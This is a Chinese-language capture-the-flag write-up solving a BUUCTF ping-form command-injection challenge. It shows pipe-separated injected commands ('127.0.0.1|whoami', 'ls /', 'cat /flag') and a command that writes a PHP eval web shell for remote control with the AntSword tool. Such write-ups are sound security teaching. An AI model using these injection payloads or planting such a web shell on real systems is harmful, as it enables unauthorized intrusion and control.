登录BUUCTF在线测评 BUUCTF在线评测
开启靶机并访问,得到下面的页面
根据提示输入要ping的地址
尝试ping本身看看
发现是可以ping通的
尝试执行命令 这里用到 | 符号分隔
补充知识点-》分隔符
command1 | command2 只执行 command2
command1 || command2 先执行 command1,如果为假,再执行 command2
127.0.0.1|whoami ,得到下面结果
可以大胆尝试其他命令
我输入 1| ls ,得到当前页面为index.php
往上跳一级 1 | ls ../
继续往上跳……
往上跳3层发现了flag
尝试cd到往上三层,但是没有成功
查看flag所在目录是否为根目录/
1| ls /
确定是根目录后,用cat查看flag
1 | cat /flag
获得了flag内容
当然也可以尝试用 webshell
首先,先往靶机写入shell文件
1 | echo '<?php @eval($_POST[123]);?>' > 123.php 点击ping后 ,
复制url,在url后添加 /123.php , 用蚁剑连接 , 密码就是$_post[] 中括号里的内容
测试连接成功后,点击添加 ,双击进入文件管理页面
查找文件夹,最后在根目录下发现flag
双击flag,即可看到flag内容
提交flag